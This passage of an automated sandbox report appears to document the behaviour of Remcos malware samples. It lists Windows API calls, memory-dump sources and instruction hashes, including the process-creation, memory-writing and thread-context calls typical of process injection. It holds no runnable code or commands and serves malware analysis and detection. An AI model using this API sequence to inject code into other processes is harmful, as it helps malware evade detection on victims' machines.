                                              Control-flow graph of 7217921-72179ee (rendered graph omitted); ReadProcessMemory is called from basic block 7217921-72179b5.
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072179A8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: ee3c2ed64d601c7463522ab38ffec3a8e8bdee15c2f4371f0aae348c0823ff71
                                              • Instruction ID: 335a0df998b3a2beaccdd4ed3922fa3d019dbd05b421e9bec69d6d1363fd5025
                                              • Opcode Fuzzy Hash: ee3c2ed64d601c7463522ab38ffec3a8e8bdee15c2f4371f0aae348c0823ff71
                                              • Instruction Fuzzy Hash: 94214AB1800349DFDB10CFA9C881BEEBBF5FF48310F10842AE558A7240D7799A45CBA1

                                              Control-flow graph of 72176a0-7217764 (rendered graph omitted); Wow64SetThreadContext is called from basic block 72176fb-721772b.
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0721771E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 5df701789c467ec75204afe086d95eedaa37b600aeddc29c383cd91d802ef607
                                              • Instruction ID: e226d612f716b4ced757eca921f5f23e61deb18183c2b45c077ae8c18c0bf6de
                                              • Opcode Fuzzy Hash: 5df701789c467ec75204afe086d95eedaa37b600aeddc29c383cd91d802ef607
                                              • Instruction Fuzzy Hash: 812147B591030A8FDB10CFAAC4857EEBBF4FF98214F14842AD459A7340CB789A45CFA1

                                              Control-flow graph of 7217928-72179ee (rendered graph omitted); ReadProcessMemory is called from basic block 7217928-72179b5.
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072179A8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: ff870f82877ea03c4457bc5d0397429d2eec9954be5dd6647fc2f5ffdda1a112
                                              • Instruction ID: 2a78a689190dd30983d7697b5f6bf712f5369267d9ca6e763180df68d0e30b26
                                              • Opcode Fuzzy Hash: ff870f82877ea03c4457bc5d0397429d2eec9954be5dd6647fc2f5ffdda1a112
                                              • Instruction Fuzzy Hash: 352139B18003499FDB10CFAAC885BEEFBF5FF48310F54842AE558A7240D7799A44CBA1

                                              Control-flow graph of 7217770-7217821 (rendered graph omitted); VirtualAllocEx is called from basic block 7217770-72177f3.
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072177E6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 80f79db87a99d3aa9271e016c050b4b7d060ebf4e8b4967388e31e1c6fa38a4c
                                              • Instruction ID: 15214e9cea5b51d2b62739f0d642985b7719a66a8d6bee141e1058cac2e490df
                                              • Opcode Fuzzy Hash: 80f79db87a99d3aa9271e016c050b4b7d060ebf4e8b4967388e31e1c6fa38a4c
                                              • Instruction Fuzzy Hash: 821156B6800209CFDB10DFA9C8457EEBBF5FF48310F24881AE559A7250CB799A55CFA0

                                              Control-flow graph of 7217778-7217821 (rendered graph omitted); VirtualAllocEx is called from basic block 7217778-72177f3.
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072177E6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 30ce6f645237f2355609273297028c2cd1b69f434125e2c0a98a2fc9c701a56c
                                              • Instruction ID: 3d30dbf219e036f46a3559fddadcbf3e82302de9dea8fe91279b8240f5e3e01c
                                              • Opcode Fuzzy Hash: 30ce6f645237f2355609273297028c2cd1b69f434125e2c0a98a2fc9c701a56c
                                              • Instruction Fuzzy Hash: 6F1137768003499FDB10DFAAC845BDEBBF5FF88310F148419E559A7250CB759950CFA1
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02D3AD24), ref: 02D3AF5E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 122ba22f42e0b7b30d5a981631f5554d5b4f9c9531b8d0d38c2594f029db90d7
                                              • Instruction ID: 68a901c6e052f2f499809ecabf59c9e1a340b1cd0c75d721eca5f92107a7a4f9
                                              • Opcode Fuzzy Hash: 122ba22f42e0b7b30d5a981631f5554d5b4f9c9531b8d0d38c2594f029db90d7
                                              • Instruction Fuzzy Hash: 941102B6D006498FDB10CF9AC444BDEFBF4EB48214F10846AE499A7750D379A945CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 5a6fdfc877f549c40ca060ec6d33130d1bf09215b306c1533efa62150352bcf1
                                              • Instruction ID: c54f5e71e54fe8e4ca504266ed680bdb2814f00b1ef8ca985f065ffe172e757e
                                              • Opcode Fuzzy Hash: 5a6fdfc877f549c40ca060ec6d33130d1bf09215b306c1533efa62150352bcf1
                                              • Instruction Fuzzy Hash: 561128B5D003498BDB10DFA9C8457EEBBF5EF88210F24882AD559A7240CB7955458BA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b7585fbed0bbf1e8691524fa011d12037fb138f874fa3c6f34c51ad2665dbd24
                                              • Instruction ID: ea524ebc7e1b7adc2bcda0f1beec69ba71455178b7b3a81be6fcf99616a0ed71
                                              • Opcode Fuzzy Hash: b7585fbed0bbf1e8691524fa011d12037fb138f874fa3c6f34c51ad2665dbd24
                                              • Instruction Fuzzy Hash: 17116AB18003498FDB10DFAAC4457DEFBF4EF88210F148419D419A7340C7796940CFA4
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5e55a8e49e914399c7762c6ce1a21c73954b47f518d6b7e5f293fa5ea7751da9
                                              • Instruction ID: 341d0f36e7ba2395afe8c8d29e7bff2d800cb9f57d48787ac1e788851d393644
                                              • Opcode Fuzzy Hash: 5e55a8e49e914399c7762c6ce1a21c73954b47f518d6b7e5f293fa5ea7751da9
                                              • Instruction Fuzzy Hash: 3211F2B58103499FDB10DF9AC885BDEBBF8FB58320F11881AE958A7250D375A944CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5ea07ec432cea9397812bd7a38ca7115ccbeea7fc8867833fcadd59c8110a12a
                                              • Instruction ID: c8197ca911c29ad8d7f31b78f9efbc548bd6db5acd3176de8408938388c3dd2e
                                              • Opcode Fuzzy Hash: 5ea07ec432cea9397812bd7a38ca7115ccbeea7fc8867833fcadd59c8110a12a
                                              • Instruction Fuzzy Hash: 2511E2B9800349DFDB10CF99C985BDEBBF8FB58310F11881AD558A7640C375A944CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0721B195
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 44df0933c0c8b003bbe5d1f1755c4aa0bd5086ce39fbcb217bf35e4fd8c36ad9
                                              • Instruction ID: 6440aa68ea337de6c54e0096ec6f509221f1ebd6c793c7020f1b70ef50230439
                                              • Opcode Fuzzy Hash: 44df0933c0c8b003bbe5d1f1755c4aa0bd5086ce39fbcb217bf35e4fd8c36ad9
                                              • Instruction Fuzzy Hash: DE0104B58103498FDB10CF89D484BDEFBF4FB58314F21884AD559A7210C3B4A544CFA1
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b78a1858bd04612b2cf22dd70e908d11d352dd16154415fd505ff40c3424a3d6
                                              • Instruction ID: 5b5e6e5b8f57a79adcf45c02119144a3c1bc4f83412246963be840bfafe33738
                                              • Opcode Fuzzy Hash: b78a1858bd04612b2cf22dd70e908d11d352dd16154415fd505ff40c3424a3d6
                                              • Instruction Fuzzy Hash: B0216775514348EFDB05DF84C9C0B6ABB65FB88324F24C16DE90A0B247C376E446CBA2
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                              • Instruction ID: 79420f7779e2a09527c4a4a574f872d46d1395ff90b7e9a9d47460154022312c
                                              • Opcode Fuzzy Hash: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                              • Instruction Fuzzy Hash: 352137B1524308DFDB01DF94C5C0B25BB65FBC4324F64C56DE9094B283C776D806CA61
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                              • Instruction ID: 4e92772379af90e0e9667d59318ca89136832ef9441eb043998ab2662271e339
                                              • Opcode Fuzzy Hash: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                              • Instruction Fuzzy Hash: 352100B1614348DFDB15DFA4D8C0B26FB65FB84B14F64C569E90A4B282C376D807CA62
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                              • Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
                                              • Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                              • Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: 0c2cedea8ccc69839a6e330f8a389d8668799a7572c784d67f1a088e08dd3f83
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 64110376404284DFDB12CF44D9C0B9ABF71FB84324F24C2A9D9090B657C33AE456CBA1
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677129504.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_123d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 652fb42ef3662e997fe01e63a0c6d3bd74b83d8597667452a5b80241330c423e
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: B611BBB5504284DFDB02CF54C5C0B15BBA1FB84224F28C6AAD9494B697C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26c9b6a680868ef9582b242b0269aa524b42bb4bcbefadf339026fc9d9f3383a
                                              • Instruction ID: 62bd96e6aa2d001e81b5ed0092a5f5e911282e1f2e3e70b0060e2471e067a574
                                              • Opcode Fuzzy Hash: 26c9b6a680868ef9582b242b0269aa524b42bb4bcbefadf339026fc9d9f3383a
                                              • Instruction Fuzzy Hash: 8901DB31114398AFF7148E95DD84B6AFFD8DF41260F18C45AEE094A286C77D9840C672
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1677056328.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_122d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93e251bf961a165395f08aacb2f13c3fc255bc2f55f451335b77e0006e6fe2ae
                                              • Instruction ID: 4b339c3aab43880084bea6ec290e226a6d1712fc3f612d8895e4314c3468bd5b
                                              • Opcode Fuzzy Hash: 93e251bf961a165395f08aacb2f13c3fc255bc2f55f451335b77e0006e6fe2ae
                                              • Instruction Fuzzy Hash: 44F0C231004384AEE7148E0ADD84B66FFA8EF50724F18C45AEE080A287C279A840CAB1

                                              Execution Graph

                                              Execution Coverage:10.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:254
                                              Total number of Limit Nodes:11

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0132D01E
                                              • GetCurrentThread.KERNEL32 ref: 0132D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0132D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0132D0F1
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7716d5d895ccb3e4860c854a0270b928390699bc4c3c80b477161156473edb49
                                              • Instruction ID: 681704935e2c286452df2c784d924631761dcece839192cd455ceceb37cb6ced
                                              • Opcode Fuzzy Hash: 7716d5d895ccb3e4860c854a0270b928390699bc4c3c80b477161156473edb49
                                              • Instruction Fuzzy Hash: B15178B09013498FDB24DFA9D548BDEBBF1BF88304F208459D419AB3A0D7745844CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0132D01E
                                              • GetCurrentThread.KERNEL32 ref: 0132D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0132D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0132D0F1
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: da321023bbb398256fb9b70ba7529bbe369a6e0830b25c061a970c9a6e80b20d
                                              • Instruction ID: 8fa2fdd588f633f4ff54aa0bf20c7daf4d51e6a198b8b61ac00050c8fa050332
                                              • Opcode Fuzzy Hash: da321023bbb398256fb9b70ba7529bbe369a6e0830b25c061a970c9a6e80b20d
                                              • Instruction Fuzzy Hash: 6A5188B09013499FDB24DFAAD548BDEBBF1FF88304F208459D019AB3A0D7745844CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03001A02
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 0afa88eb73fef4e64e16183c3bedfbcfd661f4122d19930bede05b2e32414228
                                              • Instruction ID: 8239723ef5a514dfbadfb45a4b45bc23d97a62e712769520d99998ccc3388b6e
                                              • Opcode Fuzzy Hash: 0afa88eb73fef4e64e16183c3bedfbcfd661f4122d19930bede05b2e32414228
                                              • Instruction Fuzzy Hash: BBA19C75C193889FDB06CFA5D8845DDBFB1EF0A320F1880ABE844AB262D3395945CF51

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074E7CF6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 636ffc1bf5dc61a6a054f64c862cb393081d2131542731e2e4e7dae406e46047
                                              • Instruction ID: 8826c4991169766400d05824727218dc664e59f750f0ce8a842560ad229c62fc
                                              • Opcode Fuzzy Hash: 636ffc1bf5dc61a6a054f64c862cb393081d2131542731e2e4e7dae406e46047
                                              • Instruction Fuzzy Hash: 12A15EB1D0031ACFEB11CF68C840BEEBBB6BF44325F1485AAD859A7240D7759985CF91

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074E7CF6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: ee05529eb489797823608faca1f80afeeaf95f5aa92553edd71f6e423a9e7e5a
                                              • Instruction ID: 2e12b9facd14268acf1b094abdf2b8345ad3275be596f338ddc7a2accadf9136
                                              • Opcode Fuzzy Hash: ee05529eb489797823608faca1f80afeeaf95f5aa92553edd71f6e423a9e7e5a
                                              • Instruction Fuzzy Hash: 00916EB1D0031ACFEB21CF68C840BEEBBB6BF44325F1485AAD858A7240D7749985CF91

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0132AF5E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: b535fbe6a8a30ecfad03a5231e8463b97dcc449edb3b6acd625c3819313f05d2
                                              • Instruction ID: 4f4859d3cea41dc4f29974300aae7e8f28e75783c0b53c28f75f0f909210075c
                                              • Opcode Fuzzy Hash: b535fbe6a8a30ecfad03a5231e8463b97dcc449edb3b6acd625c3819313f05d2
                                              • Instruction Fuzzy Hash: AE814770A00B158FE764EF29D45079ABBF1FF88208F00892DD49ADBB50D779E849CB91

                                              Control-flow Graph

                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03001A02
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e859b606466f1181414cc0cfbf6fb6c8ece125c079adaacec4de828247800994
                                              • Instruction ID: 3eb77c319e26966727cf5e81f68e253a97878da04a2db1ddbb65ddfcf4c3c6ea
                                              • Opcode Fuzzy Hash: e859b606466f1181414cc0cfbf6fb6c8ece125c079adaacec4de828247800994
                                              • Instruction Fuzzy Hash: 3441C0B5D003099FEB14CF99D884ADEFBF6BF48310F24812AE819AB250D7719945CF90

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013259A9
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4715cfb050dc66182eec5fbbb0ed0a588952d0ea16fa4a7b6b857968be64e093
                                              • Instruction ID: 8ecc67deaba5127e7c86c38cb94c13d4f0aa7e78bc6d450e34cd5bd6cfdc5f20
                                              • Opcode Fuzzy Hash: 4715cfb050dc66182eec5fbbb0ed0a588952d0ea16fa4a7b6b857968be64e093
                                              • Instruction Fuzzy Hash: AD41C171C10719CFEB25DFA9C8847DEBBB1BF49704F20806AD408AB251DB756946CF50

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013259A9
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 06283fa72be65c6d54e406e45df5982ff963f6ad387ec809618b41d183ce79eb
                                              • Instruction ID: 73da6f666f367cdb0f929d9a7d4c1feac0e97a09b4de1bfba08aafe4495c4733
                                              • Opcode Fuzzy Hash: 06283fa72be65c6d54e406e45df5982ff963f6ad387ec809618b41d183ce79eb
                                              • Instruction Fuzzy Hash: AE41B070D0072DCBEB25DFAAC844BDEBBB5BF49704F20806AD408AB251DB756946CF91

                                              Control-flow Graph

                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 03004101
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1759914890.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_3000000_remcos.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 52447a9270b513169f9f0d9c441eb9f0148c844cfc5f849bdfa06112926ec28b
                                              • Instruction ID: 10d7111fdde97c730507131da9236718798ae294e9d6c3e09e4c00af8d5153bd
                                              • Opcode Fuzzy Hash: 52447a9270b513169f9f0d9c441eb9f0148c844cfc5f849bdfa06112926ec28b
                                              • Instruction Fuzzy Hash: B04129B4900309CFDB14CF9AC848AAAFBF5FB88314F24C459D519AB361D775A845CFA0

                                              Control-flow Graph

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074E78C8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 1df1f77daf94ca715a92261ebcad2d776ccde1edbd407dfb2ba4ab2f82fad0b3
                                              • Instruction ID: 87d2b25e651fd29cca1e258dc29e0b3415941037aab34747c122a1890a264099
                                              • Opcode Fuzzy Hash: 1df1f77daf94ca715a92261ebcad2d776ccde1edbd407dfb2ba4ab2f82fad0b3
                                              • Instruction Fuzzy Hash: F6212AB19003199FDB10CFA9C885BDEBBF5FF48320F14842AE519A7240D7799544CBA1

                                              Control-flow Graph

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074E78C8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 939c4aa8d5e0983877450b6ce27da0a3e4b1f48a795a9873c0c32549d99f8f16
                                              • Instruction ID: 018561298c48919679e0c95a26c4d59a84797d495946cd5779c40958f40c1b4d
                                              • Opcode Fuzzy Hash: 939c4aa8d5e0983877450b6ce27da0a3e4b1f48a795a9873c0c32549d99f8f16
                                              • Instruction Fuzzy Hash: 832148B6900309DFDB00CFA9C9857EEBBF5FF48320F14882AE558A7240D7789554CBA0
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132D677
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ac6c8703c004a632512c5515ca4993b6a17e4c4451f6bde8b4c709c4e36ebeb2
                                              • Instruction ID: 256264f0db6a2a163b87c43fda732ab1a24415f3dccb820dd7d6fcbd469cae8d
